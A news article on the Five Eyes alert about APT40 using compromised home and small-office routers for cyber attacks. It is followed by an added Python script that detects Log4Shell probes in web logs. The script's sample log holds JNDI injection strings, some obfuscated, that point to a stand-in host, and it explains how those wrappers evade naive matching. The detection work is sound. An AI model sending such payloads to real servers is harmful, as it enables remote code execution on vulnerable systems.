Chinese spies target vulnerable home office kit to run cyber attacks


The APT40 group, backed by China, has been actively targeting new victims by exploiting vulnerabilities in small office and home office (SoHo) networking devices for command and control (C2) activity during their attacks. This information comes from an international alert issued by the Five Eyes allied cyber agencies from Australia, Canada, New Zealand, the UK and the US, along with partner bodies from Germany, Japan, and South Korea.

The Australian Cyber Security Centre (ACSC) stated that APT40 has targeted networks in Australia and globally using compromised SoHo devices. In two case studies published by the Australian authorities, APT40 used SoHo devices as operational infrastructure and redirectors during attacks, making their activity somewhat easier to track.

SoHo networking devices are easier targets for malicious actors compared to large enterprise equivalents. Many of these devices are end-of-life or unpatched, offering a soft target for exploitation. Once compromised, they provide a launching point for attacks to blend in with legitimate traffic and challenge network defenders.

APT40 occasionally uses procured or leased infrastructure as victim-facing C2 infrastructure, but this technique seems to be declining. The ACSC shared details of an APT40 cyber attack in August 2022, where a malicious IP interacted with the target network using a device likely belonging to a small business or home user.

Mohammed Kazem, senior threat intelligence researcher at WithSecure, highlighted the continuous evolution of Chinese government/state-sponsored cyber operations. He noted the trend among PRC actors to target edge devices via exploitation and leverage compromised devices for stealthier operations.

Noteworthy threat

APT40, also known as Kryptonite Panda, Gingham Typhoon, Leviathan, and Bronze Mohawk, is a highly active group likely based in Haikou, Hainan Province, China. Tasked by the Hainan State Security Department of China’s Ministry of State Security (MSS), APT40 was involved in cyber attacks in 2021, targeting various sectors.


The group stole intellectual property and information for China’s state-owned enterprises, making it a significant threat due to its advanced capabilities and exploitation of new vulnerabilities.

APT40 is known for targeting public-facing infrastructure, exploiting widespread vulnerabilities like Log4j, and obtaining valid credentials for attacks.

Mitigating an APT40 intrusion

Defenders should prioritize keeping logging up to date, patching promptly, and segmenting their networks to mitigate APT40 intrusions. Other recommended steps include disabling unused network services, deploying web application firewalls, enforcing least-privilege policies, using multifactor authentication, replacing end-of-life equipment, and reviewing custom applications for exploitable functionality.
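The advisory's emphasis on logging and its mention of Log4j exploitation come together in a simple triage check that defenders can run over web-server access logs: flag requests, referers and user-agent strings that carry a JNDI lookup, including the nested `${lower:j}` / `${::-j}` wrappers used to dodge naive string matching, and summarize which source addresses sent them so they can be blocked or investigated. The code below is an added example, not part of the article or the Five Eyes advisory; the log lines are constructed (documentation IP ranges, invented timestamps) and the combined-log-format parser and normalization rules are assumptions chosen for this illustration.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample access log (not taken from the advisory). The second and
# third lines carry Log4Shell-style JNDI lookups, one of them obfuscated.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Aug/2022:10:01:02 +1000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Aug/2022:10:01:05 +1000] "GET /api/status HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.99/a}"
198.51.100.7 - - [12/Aug/2022:10:01:09 +1000] "GET /login?user=${${lower:j}ndi:rmi://203.0.113.99/b} HTTP/1.1" 400 0 "-" "curl/7.68.0"
203.0.113.10 - - [12/Aug/2022:10:02:00 +1000] "POST /upload HTTP/1.1" 200 10 "-" "Mozilla/5.0"
"""

# Combined log format (assumed layout): ip ident user [ts] "request" status size "referer" "ua"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Lookup wrappers commonly used to hide the literal "jndi" token:
#   ${lower:j} / ${upper:J}      -> j / J
#   ${::-j} / ${env:NOPE:-j}     -> j   (default-value syntax)
_LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")


def normalize_lookups(text: str) -> str:
    """Collapse nested lookup wrappers until none remain, then lowercase."""
    prev = None
    while prev != text:
        prev = text
        text = _LOOKUP_CASE.sub(r"\1", text)
        text = _LOOKUP_DEFAULT.sub(r"\1", text)
    return text.lower()


def is_jndi_probe(text: str) -> bool:
    """True if the field contains a JNDI lookup after de-obfuscation."""
    return "${jndi:" in normalize_lookups(text)


@dataclass
class Finding:
    ip: str
    timestamp: str
    field: str   # which log field carried the lookup
    raw: str     # the original (un-normalized) field value for the analyst


def scan_log(log_text: str) -> list[Finding]:
    """Return one Finding per log field that carries a JNDI lookup."""
    findings: list[Finding] = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # malformed line; a production pipeline would count these
        for fld in ("request", "referer", "ua"):
            if is_jndi_probe(m[fld]):
                findings.append(Finding(m["ip"], m["ts"], fld, m[fld]))
    return findings


def probing_sources(findings: list[Finding]) -> dict[str, int]:
    """Count probe hits per source IP, the list a defender would act on."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.ip] = counts.get(f.ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h.timestamp} {h.ip} [{h.field}] {h.raw}")
    print("sources:", probing_sources(hits))
```

The normalization step matters more than the final substring match: a scanner that looks only for the literal `${jndi:` misses the wrapped forms, which is exactly why the loop re-applies the two substitutions until the string stops changing. Feed the functions real access logs and add the resulting source list to the block list or the incident ticket, alongside the patching and segmentation steps above.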
